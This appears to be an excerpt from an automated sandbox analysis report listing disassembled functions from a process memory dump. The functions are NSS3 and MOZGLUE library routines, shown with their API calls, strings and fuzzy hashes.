PR_SetError.NSS3(FFFFE890,00000000,?,6C261193), ref: 6C261D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C261193), ref: 6C261D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C261193), ref: 6C261D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C261193), ref: 6C261D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C261193), ref: 6C261D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C261193), ref: 6C261D93
PR_DestroyLock.NSS3(00000000,?,?,6C261193), ref: 6C261D9F
free.MOZGLUE(00000000,?,6C261193), ref: 6C261DA8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 07ff34dceb6aba728febaece9ce732009331af8f3516d2e6d0eade8e4e281303
Instruction ID: 20999736fb9041ac9eb611c5173a42b955fddb89de5544bf56a623acd4d77346
Opcode Fuzzy Hash: 07ff34dceb6aba728febaece9ce732009331af8f3516d2e6d0eade8e4e281303
Instruction Fuzzy Hash: 853190F5E007065BEB209F65EC41A6B7AE4AF0164DB044839ED4A86F41FB31E558CBA2

Function 6C1B5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C1B5EC0,00000000,?,?), ref: 6C1B5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C1B5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C1B5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C1B5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C1B5EC0,00000000,?,?), ref: 6C1B5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C1B5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1B5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1B5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C1B5D80

Strings

extern:, xrefs: 6C1B5CEA, 6C1B5D4B
NSS_DEFAULT_DB_TYPE, xrefs: 6C1B5D1A
dbm:, xrefs: 6C1B5D03, 6C1B5D60
sql:, xrefs: 6C1B5CD1, 6C1B5D36
multiaccess:, xrefs: 6C1B5CB8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 48b5219986e029f5279b7c32cccd90c34df360f49377ccb46a787fb39694a30c
Instruction ID: 6f4d296cf2bbecb262241deb86c357bb42c8ab408f1deb6152051ec2f2f14fb8
Opcode Fuzzy Hash: 48b5219986e029f5279b7c32cccd90c34df360f49377ccb46a787fb39694a30c
Instruction Fuzzy Hash: ED314BB07413416BF7001B29DC4DBAA33A8AF1274CF244230EE55F6AC1F776D511CA91

Function 6C1B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C281DE0,?), ref: 6C1B6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C1B6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C1B6D82
DER_GetInteger_Util.NSS3(?), ref: 6C1B6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1B6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C1B6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C1B6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C1B6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C1B6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1B7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C1B7033
free.MOZGLUE(?), ref: 6C1B703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C1B7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C1B7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C1B70AF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 78597e4d2055cce5eddede4c42d9d44f76bec0bcd62b4a8c1927d82692d74d8d
Instruction ID: 02e47b7b6efb886eeb29e94446e2b21f6768ba539829f99ba44046218c978f2d
Opcode Fuzzy Hash: 78597e4d2055cce5eddede4c42d9d44f76bec0bcd62b4a8c1927d82692d74d8d
Instruction Fuzzy Hash: A9A109719042089BEB089F24DC95B5A32A4DBB130CF24497EF958EBB81E739D845CF93

Function 6C17AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17AF39
PR_Unlock.NSS3(?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17AF69
TlsGetValue.KERNEL32 ref: 6C17B06B
EnterCriticalSection.KERNEL32(?), ref: 6C17B083
PR_Unlock.NSS3(?), ref: 6C17B0A4
TlsGetValue.KERNEL32 ref: 6C17B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C17B0D9
PR_Unlock.NSS3 ref: 6C17B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C17B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C17B182

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C17B177

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C15AB95,00000000,?,00000000,00000000,00000000), ref: 6C17B1C2

Part of subcall function 6C1A1560: TlsGetValue.KERNEL32(00000000,?,6C170844,?), ref: 6C1A157A
Part of subcall function 6C1A1560: EnterCriticalSection.KERNEL32(?,?,?,6C170844,?), ref: 6C1A158F
Part of subcall function 6C1A1560: PR_Unlock.NSS3(?,?,?,?,6C170844,?), ref: 6C1A15B2

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: d097739f5842c3ec1f3ad9ffaba97b59e531977edc805789595ead3c6c946a1d
Instruction ID: 0058d3a911a30d092f4db9cf2b02a89f27d5ab79f07921afb3154462ab4d2d38
Opcode Fuzzy Hash: d097739f5842c3ec1f3ad9ffaba97b59e531977edc805789595ead3c6c946a1d
Instruction Fuzzy Hash: 36A1D0B1D00205ABEF109FA4EC45BEE7BB4EF15308F144524ED05A7751EB31E999CBA1

Function 6C1CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CADB1

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1CADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1CAE08

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1CAE25
PL_FreeArenaPool.NSS3 ref: 6C1CAE63
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C1CAE4D

Part of subcall function 6C0D4C70: TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
Part of subcall function 6C0D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
Part of subcall function 6C0D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CAE93
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C1CAECC
PL_FreeArenaPool.NSS3 ref: 6C1CAEDE
PL_FinishArenaPool.NSS3 ref: 6C1CAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CAEF5
PL_FinishArenaPool.NSS3 ref: 6C1CAF16

Strings

security, xrefs: 6C1CADEE

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 531b8fcad8f3d95434ce66d9568cf01fbad4e4bacde7f9364269ec4d1d724904
Instruction ID: cd429476b39b9a6596f546ab76ceb00f7fe3ca06e0ebf231301ca525ba845706
Opcode Fuzzy Hash: 531b8fcad8f3d95434ce66d9568cf01fbad4e4bacde7f9364269ec4d1d724904
Instruction Fuzzy Hash: F5412BB5A0420467E7225B14AC49BAF33B49F7231CF150525F914A6F81FB3DD518CAE7

Function 6C26AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C219890: TlsGetValue.KERNEL32(?,?,?,6C2197EB), ref: 6C21989E

EnterCriticalSection.KERNEL32(?), ref: 6C26AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C26AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C26AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C26AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C26B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C26B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C26B070
PR_JoinThread.NSS3(?), ref: 6C26B07B
free.MOZGLUE(?), ref: 6C26B084
EnterCriticalSection.KERNEL32(?), ref: 6C26B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C26B0C4
PR_JoinThread.NSS3(?), ref: 6C26B0F3
free.MOZGLUE(?), ref: 6C26B0FC
PR_JoinThread.NSS3(?), ref: 6C26B137
free.MOZGLUE(?), ref: 6C26B140

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 4a0635e8267c6811255c04b5ba350ae935c9811d1cdb9f457c1a5076fbb48dfb
Instruction ID: 4f9fb5bb266b525df8a966a81acc101dbc658a4b279ef56cc703589bc8059300
Opcode Fuzzy Hash: 4a0635e8267c6811255c04b5ba350ae935c9811d1cdb9f457c1a5076fbb48dfb
Instruction Fuzzy Hash: 80915BB5900605DFCB04DF15C88494ABBF1BF4931872985A9EC195BF22EB32FC96CB91

Function 6C1E5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C1E2A28,00000060,00000001), ref: 6C1E2BF0
Part of subcall function 6C1E2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C1E2A28,00000060,00000001), ref: 6C1E2C07
Part of subcall function 6C1E2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C1E2A28,00000060,00000001), ref: 6C1E2C1E
Part of subcall function 6C1E2BE0: free.MOZGLUE(?,00000000,00000000,?,6C1E2A28,00000060,00000001), ref: 6C1E2C4A

free.MOZGLUE(?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5D0F
free.MOZGLUE(?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5D4E
free.MOZGLUE(?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5D62
free.MOZGLUE(?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5D85
free.MOZGLUE(?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5D99
free.MOZGLUE(?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C1E5E3E
free.MOZGLUE(?,?,?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C1E5E47
free.MOZGLUE(?,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000,?,6C1E80C1), ref: 6C1E5E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C1EAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C1E5E78
free.MOZGLUE(?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1E5EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1E5EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1E5F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C1EAAD4), ref: 6C1E5F4B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 926c3a79edf1e7b7cf9559af5e5a654e3f53942bce137a41aa964af9a23f56ba
Instruction ID: 313b6f1a98ad94882e6900dc9e7f6ccd5a5b030edb47c3b8ba9191ae95d36f85
Opcode Fuzzy Hash: 926c3a79edf1e7b7cf9559af5e5a654e3f53942bce137a41aa964af9a23f56ba
Instruction Fuzzy Hash: F571B2B5A00B019FD700CF64D888AA6B7F5FF99308F148529E81E87B12E732F965CB51

Function 6C168DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C168E22
EnterCriticalSection.KERNEL32(?), ref: 6C168E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C168E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C168E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C168E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C168EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C168EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C168EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F00
free.MOZGLUE(?), ref: 6C168F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C168F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F5B
PR_Unlock.NSS3(?), ref: 6C168F72
PR_Unlock.NSS3(?), ref: 6C168F82

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 74006c3130bc902dff4b8714a9a6017e9c2802fe3492c21097aca58204fc7dee
Instruction ID: df67337d3d9bd131daf2596182ba5851177ee6e92db6c18b168aae1b43648b99
Opcode Fuzzy Hash: 74006c3130bc902dff4b8714a9a6017e9c2802fe3492c21097aca58204fc7dee
Instruction Fuzzy Hash: A15128B2E002159FE7009F6ACC8496EB7B9EF56758B154169EC089BF00E731ED54C7E1

Function 6C18CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C18CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C18CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C18CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C18CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C18CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C18CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C18CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C18CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C18CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C18CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C18CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C18CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C18CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C18D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C18D021

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 48965048e76e70ab7d1e3470309bae60631fa0d7bba28523884689542ec2124e
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 9531437575BA1127EF0D11D75C21BDF244A4B6531EF440039F90FE5BC0FA89965702A5

Function 6C0DDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0DDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C0DDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C0DDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C0DDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C0DDECD

Strings

%s at line %d of [%.10s], xrefs: 6C0DDF7C, 6C0DDFEC
database corruption, xrefs: 6C0DDF77, 6C0DDFE7
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0DDF6D, 6C0DDFCC, 6C0DDFDD

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 322902351d3d25f4b646768b1b698b84e6963e346c6588775006fc1b6f42abef
Instruction ID: 8d3af1969bb289f6da51383fe719d89adb4bb99b962d9684c745b4574ac2ad2c
Opcode Fuzzy Hash: 322902351d3d25f4b646768b1b698b84e6963e346c6588775006fc1b6f42abef
Instruction Fuzzy Hash: B2A1B1716043159FCB10DF29C880B6AB7F5AF95308F56892DE8898BB51E730F945CFA2

Function 6C19EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C19EE0B

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C19EEE1

Part of subcall function 6C191D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C191D7E
Part of subcall function 6C191D50: EnterCriticalSection.KERNEL32(?), ref: 6C191D8E
Part of subcall function 6C191D50: PR_Unlock.NSS3(?), ref: 6C191DD3

TlsGetValue.KERNEL32 ref: 6C19EE51
EnterCriticalSection.KERNEL32(?), ref: 6C19EE65
PR_Unlock.NSS3(?), ref: 6C19EEA2
